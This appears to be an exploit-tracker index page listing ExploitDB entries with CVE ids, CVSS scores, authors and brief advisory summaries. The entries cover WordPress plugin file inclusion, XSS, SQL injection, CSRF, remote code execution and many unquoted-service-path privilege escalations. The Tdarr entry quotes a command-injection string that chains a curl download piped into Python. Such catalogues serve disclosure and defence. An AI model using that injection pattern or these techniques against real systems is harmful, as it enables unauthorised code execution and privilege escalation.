Text Exploits

31,433 exploits tracked across all sources.

EIP-2026-114171 EXPLOITDB text
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
by Hassan Khan Yusufzai
CVE-2021-24405 EXPLOITDB MEDIUM text
easy_cookies_policy < 1.6.2 - Authenticated Stored Cross-Site Scripting via Settings Update
The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.
by 0xB9
CVSS 6.5
CVE-2021-43701 EXPLOITDB MEDIUM text
CSZ CMS 1.2.9 - SQL Injection via fieldS[] and orderby Parameters
CSZ CMS 1.2.9 has a Time and Boolean-based Blind SQL Injection vulnerability in the endpoint /admin/export/getcsv/article_db, via the fieldS[] and orderby parameters.
by Rahad Chowdhury
CVSS 6.5
CVE-2022-50956 EXPLOITDB MEDIUM text
WordPress Plugin amministrazione-aperta 3.7.3 Local File Read
WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server.
by Hassan Khan Yusufzai
CVSS 6.2
CVE-2022-50917 EXPLOITDB HIGH text
ProtonVPN 1.26.0 - Unquoted Service Path Privilege Escalation via WireGuard Configuration
ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup.
by gemreda
CVSS 7.8
CVE-2022-27432 EXPLOITDB HIGH text
Pluck CMS 4.7.15 - Cross-Site Request Forgery
A Cross-Site Request Forgery (CSRF) in Pluck CMS v4.7.15 allows attackers to change the password of any given user by exploiting this feature, leading to account takeover.
by Devansh Bordia
CVSS 8.8
EIP-2026-117987 EXPLOITDB text
Sysax FTP Automation 6.9.0 - Privilege Escalation
by bzyo
CVE-2021-44529 EXPLOITDB CRITICAL text
Ivanti Endpoint Manager Cloud Services Appliance < 4.5 - Unauthenticated Remote Code Execution
A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
by d7x
CVSS 9.8
EIP-2026-101316 EXPLOITDB text
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
by LiquidWorm
EIP-2026-101315 EXPLOITDB text
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
by LiquidWorm
EIP-2026-113841 EXPLOITDB text
WordPress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
by Ceylan BOZOĞULLARINDAN
CVE-2022-50918 EXPLOITDB HIGH text
VIVE Runtime Service 1.0.0.4 - Code Injection
VIVE Runtime Service 1.0.0.4 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path by placing malicious executables in specific system directories to gain LocalSystem access during service startup.
by Faisal Alasmari
CVSS 8.4
EIP-2026-104183 EXPLOITDB text
Baixar GLPI Project 9.4.6 - SQLi
by Prof. Joas Antonio
CVE-2022-50919 EXPLOITDB CRITICAL text
Tdarr 2.00.15 - Unauthenticated Remote Code Execution via Help Terminal Command Injection
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
by Sam Smith
CVSS 9.8
CVE-2022-50921 EXPLOITDB HIGH text
WOW21 5.0.1.9 - Unquoted Service Path Privilege Escalation
WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup.
by Antonio Cuomo
CVSS 7.8
CVE-2022-50920 EXPLOITDB HIGH text
Sandboxie-Plus 5.50.2 - Code Injection
Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup.
by Antonio Cuomo
CVSS 8.4
CVE-2022-27095 EXPLOITDB HIGH text
BattlEye v0.9 - Privilege Escalation
BattlEye v0.9 contains an unquoted service path which allows attackers to escalate privileges to the system level.
by Saud Alenazi
CVSS 7.8
CVE-2022-27094 EXPLOITDB MEDIUM text
Sony PlayMemories Home v6.0 - Privilege Escalation
Sony PlayMemories Home v6.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
by Saud Alenazi
CVSS 6.7
EIP-2026-117445 EXPLOITDB text
McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
by Saud Alenazi
CVE-2022-50923 EXPLOITDB HIGH text
Cobian Backup 0.9 - Privilege Escalation
Cobian Backup 0.9 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the CobianReflectorService to inject malicious code that will execute with LocalSystem permissions during service startup.
by Hejap Zairy Al-Sharif
CVSS 7.8
CVE-2022-50900 EXPLOITDB HIGH text
Wondershare Dr.Fone 12.0.18 - Code Injection
Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup.
by Mohamed Alzhrani
CVSS 8.4
CVE-2022-50971 EXPLOITDB HIGH text
Malwarebytes 4.5 Unquoted Service Path Privilege Escalation
Malwarebytes 4.5 contains an unquoted service path vulnerability in the MBAMService executable that allows local attackers to escalate privileges by injecting malicious code into the system root path. Attackers can place executable files in unquoted path directories that execute with LocalSystem privileges during service startup or system reboot.
by Hejap Zairy Al-Sharif
CVSS 7.8
CVE-2022-50924 EXPLOITDB HIGH text
Private Internet Access <3.3 - Code Injection
Private Internet Access 3.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup.
by Saud Alenazi
CVSS 8.4
EIP-2026-117179 EXPLOITDB text
Foxit PDF Reader 11.0 - Unquoted Service Path
by Hejap Zairy Al-Sharif
EIP-2026-116965 EXPLOITDB text
Cloudflare WARP 1.4 - Unquoted Service Path
by Hejap Zairy Al-Sharif